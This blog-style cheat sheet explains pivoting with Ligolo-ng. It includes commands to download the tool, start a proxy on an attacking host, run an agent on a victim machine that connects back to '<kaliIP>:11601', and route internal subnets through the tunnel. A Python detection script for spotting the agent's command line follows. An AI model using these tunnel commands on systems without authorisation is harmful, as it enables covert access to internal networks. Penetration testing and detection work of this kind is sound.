Tunneling With Ligolo-Ng

Tunneling like a VPN

Description

I like to use Ligolo-ng for tunneling because it lets me route traffic through an interface like a VPN instead of relying on a bunch of SOCKS tunnels. It also works across operating systems, on both Linux and Windows, and can be used in much the same way as a traditional C2 system: establishing sessions to victims and issuing commands. Ligolo-ng can be downloaded from GitHub, and there is fairly extensive documentation on the wiki.

The goal of this post is to essentially serve as a cheat sheet for the tool, providing the commands and scripts required to quickly and easily establish tunnels during engagements.

Commands

The commands below download the appropriate proxy server and agent files (make sure to use the same version and the correct OS for each), then unpack the archives and give execute permissions to the Linux server binary.

wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_windows_amd64.zip;
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz;
unzip ligolo-ng_agent_0.6.2_windows_amd64.zip;
tar xvf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz;
chmod +x proxy

Next the Ligolo-ng server must be started on the attacking host.

sudo ./proxy -selfcert

Copy the Ligolo-ng agent to the victim machine and run it to establish a connection.

.\agent.exe -connect <kaliIP>:11601 -ignore-cert

Catch the created session and join it. Then create an interface and start the tunnel.

session
1
interface_create --name ligolo
tunnel_start --tun ligolo

Lastly, add a route for each subnet we are trying to reach: specify dev for the device, then pass the name of the interface we created in Ligolo-ng.

sudo ip route add <subnet>/24 dev ligolo

Now a proxy tunnel should be correctly set up that will route all traffic destined for the specified subnet through Ligolo-ng and the victim machine.
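On the defending side, the agent invocation shown above leaves a recognisable process command line. The following is an added example (not from the original post or the Ligolo-ng project) that scores process-creation events on the flags and default port used above; the event shape, host names and addresses are constructed assumptions.

```python
import re

# Indicators taken from the agent command shown in this post. Go's flag
# package accepts "-flag", "--flag" and "-flag=value", so all forms are matched.
CONNECT_RE = re.compile(r"(?:^|\s)-{1,2}connect[\s=]+(\S+):(\d{1,5})(?=\s|$)", re.I)
IGNORE_CERT_RE = re.compile(r"(?:^|\s)-{1,2}ignore-cert(?=\s|$)", re.I)
DEFAULT_PORT = 11601  # listener port used in the post's agent command

def score_command_line(cmdline):
    """Return (score, reasons) for one process command line."""
    reasons = []
    m = CONNECT_RE.search(cmdline)
    if m:
        reasons.append("connect-flag")
        if int(m.group(2)) == DEFAULT_PORT:
            reasons.append("default-port-11601")
    if IGNORE_CERT_RE.search(cmdline):
        reasons.append("ignore-cert")
    return len(reasons), reasons

def hunt(events, threshold=2):
    """Return events whose command line matches at least `threshold` indicators."""
    hits = []
    for ev in events:
        score, reasons = score_command_line(ev["CommandLine"])
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons})
    return hits

# Constructed process-creation events (shape loosely modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Host": "WS01", "Image": r"C:\Users\Public\agent.exe",
     "CommandLine": r".\agent.exe -connect 192.0.2.10:11601 -ignore-cert"},
    {"Host": "WS02", "Image": r"C:\Temp\svc.exe",  # renamed binary, non-default port
     "CommandLine": r"svc.exe -connect 192.0.2.10:443 -ignore-cert"},
    {"Host": "WS03", "Image": r"C:\Windows\System32\curl.exe",  # benign look-alike flag
     "CommandLine": r"curl.exe --connect-timeout 5 https://example.com"},
    {"Host": "WS04", "Image": r"C:\Tools\app.exe",  # single weak indicator only
     "CommandLine": r"app.exe -connect db01:5432"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["Host"], hit["score"], hit["reasons"])
```

Matching on the flag combination rather than the file name keeps the rule working when the binary is renamed, while the threshold of two indicators keeps unrelated tools that merely accept a -connect option out of the results.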
